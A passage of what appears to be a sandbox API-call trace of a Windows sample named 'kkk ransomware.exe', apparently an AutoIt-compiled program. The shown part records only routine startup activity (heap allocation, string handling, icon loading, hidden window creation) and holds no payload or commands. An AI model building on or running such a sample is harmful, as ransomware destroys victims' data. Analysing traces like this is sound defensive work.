0xb [0080.358] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A4300005D31_", cchLength=0xc | out: lpsz="A4300005D31_") returned 0xc [0080.358] CharUpperBuffW (in: lpsz="A4300005D31_", cchLength=0xc | out: lpsz="A4300005D31_") returned 0xc [0080.359] CharUpperBuffW (in: lpsz="A4300005D31X_", cchLength=0xd | out: lpsz="A4300005D31X_") returned 0xd [0080.359] CharUpperBuffW (in: lpsz="A4300005D31X_", cchLength=0xd | out: lpsz="A4300005D31X_") returned 0xd [0080.359] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0080.359] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0080.359] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x104, lpBuffer=0x8cf840, lpFilePart=0x8cfa54 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x8cfa54*="kkk ransomware.exe") returned 0x35 [0080.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af29d8 | out: hHeap=0x2af0000) returned 1 [0080.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a69e48 [0080.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af29b0 | out: hHeap=0x2af0000) returned 1 [0080.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a694f8 [0080.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af2a00 | out: hHeap=0x2af0000) returned 1 [0080.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x2a69ec0 [0080.359] GetSysColorBrush (nIndex=15) returned 0x100072 [0080.359] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0080.456] LoadIconW (hInstance=0x400000, lpIconName=0x63) returned 0x102d9 [0080.457] LoadIconW (hInstance=0x400000, lpIconName=0xa4) returned 0x102db [0080.459] LoadIconW (hInstance=0x400000, lpIconName=0xa2) returned 0x102dd [0080.460] LoadImageW (hInst=0x400000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x102df [0080.462] RegisterClassExW (param_1=0x8cfa30) returned 0xc19d [0080.462] GetSysColorBrush (nIndex=15) returned 0x100072 [0080.462] RegisterClassExW (param_1=0x8cf9d8) returned 0xc1a6 [0080.462] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08a [0080.462] InitCommonControlsEx (picce=0x8cfa08) returned 1 [0080.464] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x99a218 [0080.513] LoadIconW (hInstance=0x400000, lpIconName=0xa9) returned 0x102e1 [0080.514] ImageList_ReplaceIcon (himl=0x99a218, i=-1, hicon=0x102e1) returned 0 [0080.518] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xa02be [0081.182] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0081.182] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08a [0081.182] CreatePopupMenu () returned 0x1c0203 [0081.183] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xa02be, hMenu=0x1, hInstance=0x400000, lpParam=0x0) returned 0x602ba [0081.218] ShowWindow (hWnd=0xa02be, nCmdShow=0) returned 0 [0081.218] ShowWindow (hWnd=0xa02be, nCmdShow=0) returned 0 [0081.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53510 [0081.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03c0 [0081.219] CharUpperBuffW (in: lpsz="A4300005D31_", cchLength=0xc | out: lpsz="A4300005D31_") returned 0xc [0081.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53510 | out: hHeap=0x2af0000) returned 1 [0081.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03c0 | out: hHeap=0x2af0000) returned 1 [0081.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a63c40 [0081.221] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 1 [0081.286] TranslateMessage (lpMsg=0x8cf7b0) returned 0 [0081.286] DispatchMessageW (lpMsg=0x8cf7b0) returned 0x0 [0081.287] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53510 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63d48 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02f0 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64018 [0081.288] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0470 [0081.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0470 | out: hHeap=0x2af0000) returned 1 [0081.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0081.288] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f70 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03c0 [0081.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f70 | out: hHeap=0x2af0000) returned 1 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53628 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63fa0 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64108 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03f0 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a538f8 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a640d8 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04a0 [0081.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a640d8 | out: hHeap=0x2af0000) returned 1 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53a88 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64120 [0081.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f58 [0081.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63fa0 | out: hHeap=0x2af0000) returned 1 [0081.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53a38 [0081.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0320 [0081.292] CharUpperBuffW (in: lpsz="A4300005D31X_", cchLength=0xd | out: lpsz="A4300005D31X_") returned 0xd [0081.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53a38 | out: hHeap=0x2af0000) returned 1 [0081.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0320 | out: hHeap=0x2af0000) returned 1 [0081.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a63fa0 [0081.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0081.293] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f88 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0320 [0081.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f88 | out: hHeap=0x2af0000) returned 1 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53808 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64078 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f40 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0470 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53a38 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64198 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03a0 [0081.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64198 | out: hHeap=0x2af0000) returned 1 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53ad8 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63ee0 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f10 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e02b0 [0081.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64078 | out: hHeap=0x2af0000) returned 1 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53948 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02c0 [0081.293] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53948 | out: hHeap=0x2af0000) returned 1 [0081.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02c0 | out: hHeap=0x2af0000) returned 1 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64138 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x29e02c0 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63fb8 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64150 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0360 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f70 [0081.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a63fd0 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a538d0 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f88 [0081.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0410 [0081.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f88 | out: hHeap=0x2af0000) returned 1 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53ab0 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63f88 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63fe8 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dd20 [0081.295] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64000 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64000 | out: hHeap=0x2af0000) returned 1 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53858 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a640d8 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64000 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0430 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53998 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64198 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0370 [0081.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64198 | out: hHeap=0x2af0000) returned 1 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53920 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64030 [0081.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64198 [0081.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53858 | out: hHeap=0x2af0000) returned 1 [0081.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a640d8 | out: hHeap=0x2af0000) returned 1 [0081.296] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53a60 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64078 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a640c0 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a640d8 [0081.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64420 [0081.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04e0 [0081.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64360 [0081.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64360 | out: hHeap=0x2af0000) returned 1 [0081.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64420 | out: hHeap=0x2af0000) returned 1 [0081.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a640d8 | out: hHeap=0x2af0000) returned 1 [0081.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0081.299] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a640d8 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643a8 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e06a0 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643c0 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641c8 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0640 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643d8 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64498 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0660 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641f8 [0081.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64300 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64228 [0081.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0620 [0081.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642e8 [0081.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04e0 [0081.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64318 [0081.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641f8 | out: hHeap=0x2af0000) returned 1 [0081.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2af0000) returned 1 [0081.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64300 | out: hHeap=0x2af0000) returned 1 [0081.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64228 | out: hHeap=0x2af0000) returned 1 [0081.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643d8 | out: hHeap=0x2af0000) returned 1 [0081.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.304] lstrlenW (lpString="40") returned 2 [0081.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642e8 | out: hHeap=0x2af0000) returned 1 [0081.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64318 | out: hHeap=0x2af0000) returned 1 [0081.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641c8 | out: hHeap=0x2af0000) returned 1 [0081.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643c0 | out: hHeap=0x2af0000) returned 1 [0081.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06a0 | out: hHeap=0x2af0000) returned 1 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64228 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641f8 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0550 [0081.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643a8 | out: hHeap=0x2af0000) returned 1 [0081.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a640d8 | out: hHeap=0x2af0000) returned 1 [0081.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641f8 | out: hHeap=0x2af0000) returned 1 [0081.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0550 | out: hHeap=0x2af0000) returned 1 [0081.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64228 | out: hHeap=0x2af0000) returned 1 [0081.306] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.306] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0650 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64480 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64468 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e06a0 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64330 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641b0 [0081.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643d8 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64378 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04c0 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641e0 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64348 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64360 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05a0 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05a0 | out: hHeap=0x2af0000) returned 1 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64498 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0500 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64390 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641e0 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64378 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64348 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64360 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643d8 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.307] lstrlenW (lpString="54") returned 2 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64390 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641b0 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64330 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06a0 | out: hHeap=0x2af0000) returned 1 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64450 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64288 [0081.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0530 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64468 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64480 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, 